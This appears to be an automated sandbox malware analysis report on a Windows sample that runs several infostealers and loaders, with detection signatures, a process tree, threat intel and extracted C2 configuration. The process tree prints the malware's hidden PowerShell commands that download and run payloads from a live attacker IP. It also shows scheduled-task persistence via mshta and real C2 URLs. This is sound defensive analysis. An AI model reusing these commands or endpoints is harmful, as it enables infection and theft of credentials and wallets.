Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1610226
MD5:	ebb19356f4a1f8d9aa63efcad72818a6
SHA1:	005666bf6270b976c4e2c2faf13491da29389c7e
SHA256:	8313c081a92b8c3e8debe8b6662ce1531cbf3d0e6464c1a6d0ee178568a52c40
Tags:	exeStealcuser-aachum
Infos:

Detection

ScreenConnect Tool, Amadey, Healer AV Disabler, LummaC Stealer, PureLog Stealer, RedLine, Stealc

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Healer AV Disabler

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected obfuscated html page

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates HTA files

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected ScreenConnect Tool

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\random.exe" MD5: EBB19356F4A1F8D9AA63EFCAD72818A6)

4CAJNBDWED5ZLJ2B.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe" MD5: 9029A85B5FFA5BD915CD2A463BCDA9A4)

chrome.exe (PID: 4008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2188,i,471670975520233966,4041854112257341000,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe" MD5: E49EB0E441625B8CD5AB5241449ADDF1)

skotes.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: E49EB0E441625B8CD5AB5241449ADDF1)

skotes.exe (PID: 2916 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: E49EB0E441625B8CD5AB5241449ADDF1)

svchost.exe (PID: 7196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

skotes.exe (PID: 8076 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: E49EB0E441625B8CD5AB5241449ADDF1)

a59b997485.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" MD5: 449ECF36234C04C28AB61F71F84D6D6C)

cmd.exe (PID: 7944 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1928 cmdline: schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 8008 cmdline: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 8148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE (PID: 7340 cmdline: "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE" MD5: D24793DE46AC7C8B75AF488DE1296385)

cmd.exe (PID: 4960 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7476 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7352 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 3604 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 1804 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 1196 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 6184 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

schtasks.exe (PID: 7604 cmdline: schtasks /create /tn "3d1I8ma3ZrJ" /tr "mshta \"C:\Temp\akcRBGtSi.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 7632 cmdline: mshta "C:\Temp\akcRBGtSi.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 1284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: E49EB0E441625B8CD5AB5241449ADDF1)

f2d6093d56.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe" MD5: DB3632EF37D9E27DFA2FD76F320540CA)

b33114b970.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)

cmd.exe (PID: 560 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6232 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 676 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

095fb861eb.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)

095fb861eb.exe (PID: 5164 cmdline: "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)

mshta.exe (PID: 3844 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE (PID: 4408 cmdline: "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE" MD5: D24793DE46AC7C8B75AF488DE1296385)

mshta.exe (PID: 5272 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\akcRBGtSi.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

a59b997485.exe (PID: 4624 cmdline: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" MD5: 449ECF36234C04C28AB61F71F84D6D6C)

cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6152 cmdline: schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 1440 cmdline: mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE (PID: 3756 cmdline: "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE" MD5: D24793DE46AC7C8B75AF488DE1296385)

mshta.exe (PID: 6800 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\ID499IQcV.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE" MD5: D24793DE46AC7C8B75AF488DE1296385)

cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5040 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1104 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1188 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7656 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5816 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1076 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)

schtasks.exe (PID: 5764 cmdline: schtasks /create /tn "In6qPmaKHFs" /tr "mshta \"C:\Temp\sJKQarzEf.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

mshta.exe (PID: 6220 cmdline: mshta "C:\Temp\sJKQarzEf.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7852 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\sJKQarzEf.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

a59b997485.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" MD5: 449ECF36234C04C28AB61F71F84D6D6C)

cmd.exe (PID: 6164 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3808 cmdline: schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 4940 cmdline: mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

svchost.exe (PID: 4268 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\ID499IQcV.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Temp\akcRBGtSi.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Temp\sJKQarzEf.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cBeNU75[1].exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000004C.00000000.2555274207.0000000000632000.00000002.00000001.01000000.0000001D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.2185747966.0000000000401000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000035.00000002.2949636350.000000000A390000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1865551191.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000004C.00000002.2921128413.0000000003C29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000002A.00000002.2450990713.0000000000051000.00000040.00000001.01000000.00000019.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1747846572.000000000192E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1747879778.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1956903484.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
